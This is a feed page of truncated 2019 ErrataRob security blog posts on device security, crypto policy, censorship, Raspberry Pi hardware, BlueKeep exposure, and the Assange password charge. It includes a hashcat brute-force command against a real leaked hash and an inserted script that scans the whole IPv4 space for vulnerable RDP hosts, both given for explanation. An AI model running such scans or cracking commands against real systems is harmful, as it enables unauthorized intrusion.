What's new around the internet


ErrataRob 2019-08-04 18:52:45 Securing devices for DEFCON (direct link)

There's been much debate whether you should get burner devices for hacking conventions like DEF CON (phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case.

These are the things I worry about:

backup before you go
update before you go
correctly locking your devices with full disk encryption
correctly configuring WiFi
Bluetooth devices
mobile phones vs. Stingrays
USB

Backup

Traveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat than in whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want even more to target the gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this.

Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.

Update

Like most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates. Backup before you update, but then, I already mentioned that above.

Full disk encryption

This is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it.

You are at risk if you have a simple unlock code, like a predictable pattern or a 4-digit code. The longer and less predictable your unlock code, the more secure you are.

I use the iPhone's "Face ID" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable Face ID (by holding the buttons on both sides for 2 seconds).

As for laptops, it's usually easy to enable full disk encryption. However, there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third-party full disk encryption products that use simple passwords.

If you don't have a TPM, then hackers can brute-force crack your password, trying billions of guesses per second. This applies to my MacBook Air, which is the 2017 model from before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password.

I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to an account with a simpler password for going in/out of sleep mode. This second account can't be used to decrypt the drive.

On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short.

I ignore the "evil maid" threat, because my devices are always with me rather than in…
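To make the brute-force numbers concrete, here's a back-of-the-envelope sketch (my own illustration, not from the post); the guess rate is an assumed figure in line with the "billions of guesses per second" above.

```python
# Worst-case time to exhaust every password of a given length, assuming
# an offline attack with no TPM to throttle guessing. The 10 billion
# guesses/second rate is an assumption for illustration.

GUESSES_PER_SECOND = 10_000_000_000

def crack_time_years(alphabet_size: int, length: int) -> float:
    """Years to try the full keyspace at the assumed guess rate."""
    keyspace = alphabet_size ** length
    return keyspace / GUESSES_PER_SECOND / (3600 * 24 * 365)

print(f"{crack_time_years(26, 8):.7f} years")    # 8 lowercase letters: ~20 seconds
print(f"{crack_time_years(95, 12):,.0f} years")  # 12 printable-ASCII chars: ~1.7 million years
```

The asymmetry is the whole point: each added character multiplies the attacker's work, which is why a long, unpredictable passphrase beats any clever short one.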
ErrataRob 2019-07-28 15:21:32 Why we fight for crypto (direct link)

This last week, Attorney General William Barr called for crypto backdoors. His speech is a fair summary of law enforcement's side of the argument. In this post, I'm going to address many of his arguments.

The tl;dr version of this blog post is this:

Their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.

But we aren't talking about a tradeoff with privacy alone, but with other rights. In particular, it's every bit as important to protect the rights of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to their "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.

Thirdly, there is the problem of technical feasibility. We don't know how to make backdoors available for law-enforcement access in a way that doesn't enormously reduce security for users.

Balance

The crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the Constitution by the Fourth Amendment. The Fourth doesn't express an absolute right to privacy, but allows police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption is creating a "law free zone" enabling crime to be conducted without the ability of the police to investigate.

It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything, to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil liberty concerns.

However, this argument is wrong, as I'll discuss below.

Law free zones

Barr claims encryption creates a new "law free zone ... giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before.

Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the Constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit.

The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room.

Technology didn't create these zones. However, technological advances are allowing police to defeat them.

Businesses have security cameras everywhere. Neighborhood associations are installing license plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes, listening to us. Our phones and computers have microphones and cameras. Our TVs increasingly have cameras and mics, too, in case we want to use them for video conferencing, or give them voice commands.

Every argument Barr makes about crypto backdoors applies to backdoor access to microphones; every argument applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These…
ErrataRob 2019-06-14 19:45:51 Censorship vs. the memes (direct link)

The most annoying thing in any conversation is when people drop a meme bomb, some simple concept they've heard elsewhere in a nice package that they really haven't thought through, which takes time and nuance to rebut. These memes are often bankrupt of any meaning.

When discussing censorship, which is wildly popular these days, people keep repeating these same memes to justify it:

you can't yell fire in a crowded movie theater
but this speech is harmful
Karl Popper's Paradox of Tolerance
censorship/free-speech don't apply to private organizations
Twitter blocks and free speech

This post takes some time to discuss these memes, so I can refer back to it later, instead of repeating the argument every time some new person repeats the same old meme.

You can't yell fire in a crowded movie theater

This phrase was first used in the Supreme Court decision Schenck v. United States to justify outlawing protests against the draft. Unless you also believe the government can jail you for protesting the draft, then the phrase is bankrupt of all meaning.

In other words, how can it be used to justify the thing you are trying to censor and yet be an invalid justification for censoring those things (like draft protests) you don't want censored?

What this phrase actually means is that because it's okay to suppress one type of speech, it justifies censoring any speech you want. Which means all censorship is valid. If that's what you believe, just come out and say "all censorship is valid".

But this speech is harmful or invalid

That's what everyone says. In the history of censorship, nobody has ever wanted to censor good speech, only speech they claimed was objectively bad, invalid, unreasonable, malicious, or otherwise harmful.

It's just that everybody has different definitions of what, actually, is bad, harmful, or invalid. It's like the movie theater quote. For example, China's constitution proclaims freedom of speech, yet the government blocks all mention of the Tiananmen Square massacre because it's harmful. Its "Great Firewall of China" is famous for blocking most of the content of the Internet that the government claims harms its citizens.

"I put some photos of the Tiananmen anniversary mass vigil in #Hongkong last night onto Wechat and my account has been suspended for 'spreading malicious rumours'. The #China of today..." pic.twitter.com/F6e2exsgGE - Stephen McDonell (@StephenMcDonell) June 5, 2019

At least in the case of movie theaters, the harm of shouting "fire" is immediate and direct. In all these other cases, the harm is many steps removed. Many want to censor anti-vaxxers, because their speech kills children. But the speech doesn't, the virus does. By extension, those not getting vaccinations may harm peopl…
ErrataRob 2019-05-31 20:15:34 Some Raspberry Pi compatible computers (direct link)

I noticed this spreadsheet over at the r/raspberry_pi reddit. I thought I'd write up some additional notes.

https://docs.google.com/spreadsheets/d/1jWMaK-26EEAKMhmp6SLhjScWW2WKH4eKD-93hjpmm_s/edit#gid=0

Consider the Upboard, an x86 computer in the Raspberry Pi form factor for $99. When you include storage, power supplies, heatsinks, cases, and so on, it's actually pretty competitive. It's not ARM, so many things built for the Raspberry Pi won't necessarily work. But on the other hand, most of the software built for the Raspberry Pi was originally developed for x86 anyway, so sometimes it'll work better.

Consider the quasi-RPi boards that support the same GPIO headers, but in a form factor that's not the same as a RPi. A good example would be the ODroid-N2. These aren't listed in the above spreadsheet, but there's a ton of them. There are only two Nano Pis listed in the spreadsheet having the same form factor as the RPi, but there are around 20 different actual boards with all sorts of different form factors and capabilities.

Consider the heatsink, which can make a big difference in the performance and stability of the board. You can put a small heatsink on any board, but you really need larger heatsinks and possibly fans. Some boards, like the ODroid-C2, come with a nice large heatsink. Other boards have a custom-designed large heatsink you can purchase along with the board for around $10. The Raspberry Pi, of course, has numerous third-party heatsinks available. Whether or not there's a nice large heatsink available is an important buying criterion. That spreadsheet should have a column for "Large Heatsink", whether one is "Integrated" or "Available".

Consider power consumption and heat dissipation as a buying criterion. Uniquely among the competing devices, the Raspberry Pi itself uses a CPU fabbed on a 40nm process, whereas most of the competitors use 28nm or even 14nm. That means it consumes more power and produces more heat than any of its competitors, by a large margin. The Intel Atom CPU mentioned above is actually one of the most power efficient, being fabbed on a 14nm process. Ideally, that spreadsheet would have two additional columns for power consumption (and hence heat production) at "Idle" and "Load".

You shouldn't really care about CPU speed. But if you do, there are basically two classes of speed: in-order and out-of-order. For the same GHz, out-of-order CPUs are roughly twice as fast as in-order. The Cortex A5, A7, and A53 are in-order. The Cortex A17, A72, and A73 (and the Intel Atom) are out-of-order. The spreadsheet also lists some NXP i.MX series processors, but those are actually ARM Cortex designs. I don't know which, though.

The spreadsheet lists memory, like LPDDR3 or DDR4, but it's unclear as to speed. There are two things that determine speed: the number of MHz/GHz and the width, typically either 32 bits or 64 bits. By "64 bits" we can mean a single channel that's 64 bits wide, as in the case of the Intel Atom processors, or two channels that are each 32 bits wide, as in the case of some ARM processors. The Raspberry Pi has an incredibly anemic 32-bit 400-MHz memory, whereas some competitors have 64-bit 1600-MHz memory, or roughly 8 times the speed. For CPU-bound tasks, this isn't so important, but a lot of tasks are in fact bound by memory speed.

As for GPUs, most are not OpenCL programmable, but some are. The VideoCore and Mali 4xx (Utgard) GPUs are not programmable. The Mali Txxx (Midgard) GPUs are programmable. The "MP2" suffix means two GPU processors, whereas "MP4" means four GPU processors. For a lot of tasks, such as "SDR" (software defined radio), offloading onto the GPU simultaneously reduce…
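As a quick sanity check on that "roughly 8 times" figure, here's a small sketch (my own illustration, not from the post) computing theoretical peak memory bandwidth from bus width and effective transfer rate.

```python
# Theoretical peak memory bandwidth = transfers/sec * bus width in bytes.
# Illustrative numbers from the text: RPi ~ 32-bit @ 400 MHz effective,
# vs. a competitor at 64-bit @ 1600 MHz effective.

def bandwidth_gbps(mhz_effective: float, bus_bits: int) -> float:
    """Peak bandwidth in gigabytes per second."""
    return mhz_effective * 1e6 * (bus_bits / 8) / 1e9

rpi = bandwidth_gbps(400, 32)          # ~1.6 GB/s
competitor = bandwidth_gbps(1600, 64)  # ~12.8 GB/s
print(rpi, competitor, competitor / rpi)  # ratio ~8x, as claimed
```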
ErrataRob 2019-05-29 20:16:09 Your threat model is wrong (direct link)

Several subjects have come up within the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the threat that exists, you've morphed the threat into something else that you'd rather deal with, or which is easier to understand.

Phishing

An example is this question that misunderstands the threat of "phishing":

"Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL" - briankrebs (@briankrebs) May 29, 2019

The (wrong) threat model here is that phishing is an email that smart users with training can identify and avoid. This isn't true.

Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".

"Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator." - Tyler Pieron (@tyler_pieron) May 29, 2019

Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.

In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as by using two-factor authentication.

IoT security

After the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.

But auto-updates are a bigger threat than worms.

Since Mirai, roughly 10 billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10 billion new IoT devices, it's still Windows and not IoT that is the main problem.

The answer is that number, 10 billion. Internet worms work by guessing IPv4 addresses, of which there are only 4 billion. You can't have 10 billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10 billion devices are almost entirely being put on private ne…
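To illustrate the address-space arithmetic behind that claim, here's a small sketch (mine, with one assumed figure) of why random IPv4 scanning finds public devices but can't account for 10 billion of them.

```python
# Internet worms like Mirai spread by guessing random IPv4 addresses.
# There are only 2**32 of those, so most of the ~10 billion IoT devices
# must sit behind NAT on private networks, unreachable by this technique.
# The device count is the figure from the text.

total_ipv4 = 2 ** 32              # ~4.29 billion possible addresses
iot_devices = 10_000_000_000
print(iot_devices / total_ipv4)   # > 2 devices per address: impossible
                                  # without NAT/private addressing

# At a Mirai-like scan rate (assumed here as 100k probes/sec per bot),
# sweeping the whole IPv4 space takes about half a day:
probes_per_second = 100_000
hours = total_ipv4 / probes_per_second / 3600
print(f"{hours:.1f} hours for one bot to try every address")
```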
ErrataRob 2019-05-28 06:20:06 Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (direct link)

Microsoft announced a vulnerability in its "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I find nearly 1 million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and NotPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.

To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.

This returned 7,629,102 results (over 7 million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.

Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.

The table of results is as follows:

1447579  UNKNOWN - receive timeout
1414793  SAFE - Target appears patched
1294719  UNKNOWN - connection reset by peer
1235448  SAFE - CredSSP/NLA required
 923671  VULNERABLE - got appid
 651545  UNKNOWN - FIN received
 438480  UNKNOWN - connect timeout
 105721  UNKNOWN - connect failed 9
  82836  SAFE - not RDP but HTTP
  24833  UNKNOWN - connection reset on connect
   3098  UNKNOWN - network error
   2576  UNKNOWN - connection terminated

The various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and responds weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, that for some reason return errors sometimes.

The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.

The next result is those marked SAFE due to probably being patched. Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.

The next result to look at is those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, but only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.

The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o…
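Here's a rough sketch (my reconstruction, not the author's actual pipeline) of how a two-stage scan like this glues together; it assumes masscan's -oL list output format and an rdpscan binary that takes one address per invocation, so treat the exact flags as assumptions and never run this without authorization and a proper exclude list.

```python
# Two-stage scan: masscan finds hosts with 3389 open quickly; a slower
# protocol-level checker then tests only those hits. Flags are
# illustrative; check each tool's documentation before relying on them.
import subprocess
from collections import Counter

# Stage 1: fast port sweep. masscan's -oL lines look like:
#   open tcp 3389 192.0.2.10 1558000000
subprocess.run(
    ["masscan", "-p3389", "0.0.0.0/0",
     "--excludefile", "exclude.txt", "--rate", "100000",
     "-oL", "rdp.txt"],
    check=True)

with open("rdp.txt") as f:
    addresses = [line.split()[3] for line in f if line.startswith("open")]

# Stage 2: the thousand-times-slower per-host check, tallying verdicts.
verdicts = Counter()
for addr in addresses:
    out = subprocess.run(["rdpscan", addr],
                         capture_output=True, text=True).stdout
    for verdict in ("VULNERABLE", "SAFE", "UNKNOWN"):
        if verdict in out:
            verdicts[verdict] += 1
            break
    else:
        verdicts["UNKNOWN"] += 1

print(verdicts.most_common())
```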
ErrataRob 2019-05-27 19:59:38 A lesson in journalism vs. cybersecurity (direct link)

A recent NYTimes article blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many sources to support the conclusion that the NSA is to be blamed, but only a single quote, from the NSA director, from the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find, it's that the story's authors didn't look.

The main reason experts disagree is that the NSA's EternalBlue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with Windows networking and stolen credentials. Yes, ransomware increasingly includes EternalBlue as part of its arsenal of attacks, but this doesn't mean EternalBlue is responsible for ransomware.

The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph:

That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue. Instead, the story is citing anonymous researchers claiming that EternalBlue has been added to Emotet since after that DHS warning.

Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism are that you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least, credible.

And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out.

In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use EternalBlue to spread. However, what ransomware is relying upon is still the Wind…
ErrataRob 2019-04-23 00:18:02 Programming languages infosec professionals should learn (direct link)

Code is an essential skill of the infosec professional, but there are so many languages to choose from. What language should you learn? As a heavy coder, I thought I'd answer that question, or at least give some perspective.

The tl;dr is JavaScript. Whatever other language you learn, you'll also need to learn JavaScript. It's the language of browsers, Word macros, JSON, NodeJS server side, scripting on the command-line, and Electron apps. You'll also need a bit of bash and/or PowerShell scripting skills, SQL for database queries, and regex for extracting data from text files. Other languages are important as well; Python is very popular, for example. Actively avoid C++ and PHP as they are obsolete.

Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Code from Microsoft. Also, whatever language you learn, stash your code at GitHub.

Let's talk in general terms. Here are some types of languages.

Unavoidable. As mentioned above, familiarity with JavaScript, bash/PowerShell, and SQL is unavoidable. If you are avoiding them, you are doing something wrong.

Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool-using animal, this is your basic tool. You are a monkey; this is the stick you use to knock down the banana. Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising amount of "programming" tasks in those languages. Old-timers use things like PERL or TCL. Sometimes the choice of which language to learn depends upon the vast libraries that come with the languages, especially Python and JavaScript libraries.

Development languages. Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task like C, C++, Java, C#, Rust, Go, or Swift.

Domain-specific languages. The language Lua is built into nmap, snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or Matlab. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.

As an experienced developer, here are my comments on the various languages, sorted in alphabetical order.

bash (and other Unix shells)

You have to learn some bash for dealing with the command-line. But it's also a fairly complete programming language. Perusing the scripts in an average Linux distribution, especially some of the older ones, you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux.

In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox, which has "ash". I mention this because my bash skills are rather poor, partly because I originally learned "csh" and get my syntax variants confused.

As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things. In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, so good bash language skills are a must.

C

This is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i…
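Since regex "for extracting data from text files" sits on the unavoidable list above, here's a minimal sketch of the kind of quick-and-dirty script being described; the log lines it parses follow the common sshd "Failed password" format, but treat that format as an assumption about your input.

```python
# Quick-and-dirty extraction: pull usernames and source IPs out of an
# auth log and rank the noisiest offenders. The line format matched
# here is the common sshd style, assumed for illustration.
import re
from collections import Counter

FAILED = re.compile(r"Failed password for (\S+) from (\d{1,3}(?:\.\d{1,3}){3})")

attempts = Counter()
with open("auth.log") as f:
    for line in f:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            attempts[(user, ip)] += 1

for (user, ip), n in attempts.most_common(10):
    print(f"{n:6d}  {user}@{ip}")
```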
ErrataRob 2019-04-21 17:16:36 Was it a Chinese spy or confused tourist? (direct link)

Politico has an article from a former spy analyzing whether the "spy" they caught at Mar-a-Lago (Trump's Florida vacation spot) was actually a "spy". I thought I'd add to it from a technical perspective about her malware, USB drives, phones, cash, and so on.

The part that has gotten the most press is that she had a USB drive with evil malware. We've belittled the Secret Service agents who infected themselves, and we've used this as the most important reason to suspect she was a spy.

But it's nonsense.

It could be something significant, but we can't know that based on the details that have been reported. What the Secret Service reported was that it "started installing software". That's a symptom of a USB device installing drivers, not malware. Common USB devices, such as WiFi adapters, Bluetooth adapters, microSD readers, and 2FA keys look identical to flash drives, and when inserted into a computer, cause Windows to install drivers.

Visibly "installing files" is not a symptom of malware. When malware does its job right, there are no symptoms. It installs invisibly in the background. That's the entire point of malware, that you don't know it's there. This is not to say there would be no visible evidence. A popular way of hacking desktops with USB drives is by emulating a keyboard/mouse that quickly types commands, which will cause some visual artifacts on the screen. It's just that "installing files" does not lend itself to malware as being the most likely explanation.

That it was "malware" instead of something normal is just the standard trope that anything unexplained is proof of hackers/viruses. We have no evidence it was actually malware, and the evidence we do have suggests something other than malware.

Lots of travelers carry wads of cash. I carry ten $100 bills with me, hidden in my luggage, for emergencies. I've been caught before when the credit card company's fraud detection triggers in a foreign country, leaving me with nothing. It's very distressing, hence cash.

The Politico story mentioned the "spy" also has a U.S. bank account, and thus cash wasn't needed. Well, I carry that cash, too, for domestic travel. It's just not for international travel. In any case, the U.S. may have been just one stop on a multi-country itinerary. I've taken several "round the world" trips where I've just flown one direction, such as east, before getting back home. $8k is in the range of cash that such travelers carry.

The same is true of phones and SIMs. Different countries have different frequencies and technologies. In the past, I've traveled with as many as three phones (US, Japan, Europe). It's gotten better with modern 4G phones, where my iPhone Xs should work everywhere. (Though it's likely going to diverge again with 5G, as the U.S. goes on a different path from the rest of the world.)

The same is true with SIMs. In the past, you pretty much needed a different SIM for each country. Arrival in the airport meant going to the kiosk to get a SIM for $10. At the end of a long itinerary, I'd arrive home with several SIMs. These days, however, with so many "MVNOs", such as Google Fi, this is radically less necessary. However, the fact that the latest high-end phones all support dual SIMs proves it's still an issue.

Thus, the evidence so far is that of a normal traveler. If these SIMs/phones are indeed because of spying, we would need additional evidence. A quick analysis of the accounts associated with the SIMs and of the contents of the phones should tell us if she's a traveler or spy.

Normal travelers may be concerned about hidden cameras. There's this story about Korean hotels filming guests, and this other one about…
ErrataRob 2019-04-11 20:22:14 Assange indicted for breaking a password (direct link)

In today's news, after 9 years holed up in the Ecuadorian embassy, Julian Assange has finally been arrested. The US DoJ accuses Assange of trying to break a password. I thought I'd write up a technical explainer of what this means.

According to the US DoJ's press release:

"Julian P. Assange, 47, the founder of WikiLeaks, was arrested today in the United Kingdom pursuant to the U.S./UK Extradition Treaty, in connection with a federal charge of conspiracy to commit computer intrusion for agreeing to break a password to a classified U.S. government computer."

The full indictment is here.

It seems the indictment is based on already-public information that came out during Manning's trial, namely this log of chats between Assange and Manning, specifically the section where Assange appears to agree to break a password.

What this says is that Manning hacked a DoD computer and found the hash "80c11049faebf441d524fb3c4cd5351c" and asked Assange to crack it. Assange appears to agree.

So what is a "hash", what can Assange do with it, and how did Manning grab it?

Computers store passwords in an encrypted (sic) form called a "one way hash". Since it's "one way", it can never be decrypted. However, each time you log into a computer, it again performs the one way hash on what you typed in, and compares it with the stored version to see if they match. Thus, a computer can verify you've entered the right password, without knowing the password itself, or storing it in a form hackers can easily grab. Hackers can only steal the encrypted form, the hash.

When they get the hash, while it can't be decrypted, hackers can keep guessing passwords, performing the one way algorithm on them, and seeing if they match. With an average desktop computer, they can test a billion guesses per second. This may seem like a lot, but if you've chosen a sufficiently long and complex password (more than 12 characters with letters, numbers, and punctuation), then hackers can't guess them.

It's unclear what format this password is in, whether "NT" or "NTLM". Using my notebook computer, I could attempt to crack the NT format using the hashcat password cracker with the following command:

hashcat -m 3000 -a 3 80c11049faebf441d524fb3c4cd5351c ?a?a?a?a?a?a?a

As this image shows, it'll take about 22 hours on my laptop to crack this. However, this doesn't succeed, so it seems that this isn't in the NT format. Unlike other password formats, the "NT" format can only be 7 characters in length, so we can completely crack it.
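To make the "one way hash" login check concrete, here's a minimal sketch of the verify-by-rehashing idea; it uses salted SHA-256 purely for illustration, not Windows' actual NT hash format, and real systems should prefer a slow KDF like bcrypt or argon2.

```python
# Password verification without storing the password: store only a
# one-way hash, re-hash whatever the user types, and compare.
# Salted SHA-256 is illustrative only; it is not the NT format.
import hashlib
import hmac
import os

def make_record(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)
    digest = hashlib.sha256(salt + password.encode()).digest()
    return salt, digest            # this is all the system stores

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    attempt = hashlib.sha256(salt + password.encode()).digest()
    return hmac.compare_digest(attempt, digest)  # constant-time compare

salt, digest = make_record("hunter2")
print(verify("hunter2", salt, digest))    # True
print(verify("password", salt, digest))   # False
```

This is also why cracking works the way the post describes: the attacker can't reverse the digest, but nothing stops them from running make_record's hash step billions of times per second over guessed passwords.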
ErrataRob 2019-03-12 18:43:41 Some notes on the Raspberry Pi (direct link)

I keep seeing this article in my timeline today about the Raspberry Pi. I thought I'd write up some notes about it.

The Raspberry Pi costs $35 for the board, but to achieve a fully functional system, you'll need to add a power supply, storage, and heatsink, which ends up costing around $70 for the full system. At that price range, there are lots of alternatives. For example, you can get a fully functional $99 Windows x86 PC that's just as small and consumes less electrical power.

There are a ton of Raspberry Pi competitors, often cheaper with better hardware, such as an Odroid-C2, Rock64, Nano Pi, Orange Pi, and so on. There are also a bunch of "Android TV boxes" running roughly the same hardware for cheaper prices, that you can wipe and reinstall Linux on. You can also acquire Android phones for $40.

However, while "better" technically, the alternatives all suffer from the fact that the Raspberry Pi is better supported -- vastly better supported. The ecosystem of ARM products focuses on getting Android to work, and does poorly at getting generic Linux working. The Raspberry Pi has the worst, most out-of-date hardware of any of its competitors, but I'm not sure I can wholly recommend any competitor, as they simply don't have the level of support the Raspberry Pi does.

The defining feature of the Raspberry Pi isn't that it's a small/cheap computer, but that it's a computer with a bunch of GPIO pins. When you look at the board, it doesn't just have the recognizable HDMI, Ethernet, and USB connectors, but also has 40 raw pins strung out across the top of the board. There are also a couple extra connectors for cameras.

The concept wasn't simply that of a generic computer, but a maker device, for robot servos, temperature and weather measurements, cameras for a telescope, controlling Christmas light displays, and so on.

I think this is underemphasized in the above story. The reason it finds use in factories is because they have the same sorts of needs for controlling things that maker kids do. A lot of industrial needs can be satisfied by a teenager buying $50 of hardware off Adafruit and writing a few Python scripts.

On the other hand, support for industrial uses is nearly nonexistent. The reason commercial products cost $1000 is because somebody will answer your phone, unlike the teenager who's currently out at the movies with their friends. However, with more and more people having experience with the Raspberry Pi, presumably you'll be able to hire generic consultants soon that can maintain th…
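As an illustration of that "few Python scripts" point, here's the scale of program being talked about, toggling a device on a GPIO pin with the common RPi.GPIO library; the pin number and the relay wired to it are assumptions about the hardware.

```python
# Toggle a device wired to a GPIO pin -- the kind of small control task
# the article has in mind. Pin 17 and the attached relay are assumed
# wiring; adjust for your setup.
import time

import RPi.GPIO as GPIO

RELAY_PIN = 17                     # BCM numbering, assumed wiring

GPIO.setmode(GPIO.BCM)
GPIO.setup(RELAY_PIN, GPIO.OUT)

try:
    while True:
        GPIO.output(RELAY_PIN, GPIO.HIGH)   # energize the relay
        time.sleep(1.0)
        GPIO.output(RELAY_PIN, GPIO.LOW)    # release it
        time.sleep(1.0)
finally:
    GPIO.cleanup()                 # release the pins on exit
```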
ErrataRob 2019-03-09 15:39:51 A quick lesson in confirmation bias (direct link)

In my experience, hacking investigations are driven by ignorance and confirmation bias. We regularly see things we cannot explain. We respond by coming up with a story where our pet theory explains it. Since there is no alternative explanation, this then becomes evidence of our theory, where this otherwise inexplicable thing becomes proof.

For example, take that "Trump-AlfaBank" theory. One of the oddities noted by researchers is lookups for "trump-email.com.moscow.alfaintra.net". One of the conspiracy theorists explains this as proof of human error, somebody "fat fingering" the wrong name when typing it in, thus proving humans were involved in trying to communicate between the two entities, as opposed to simple automated systems.

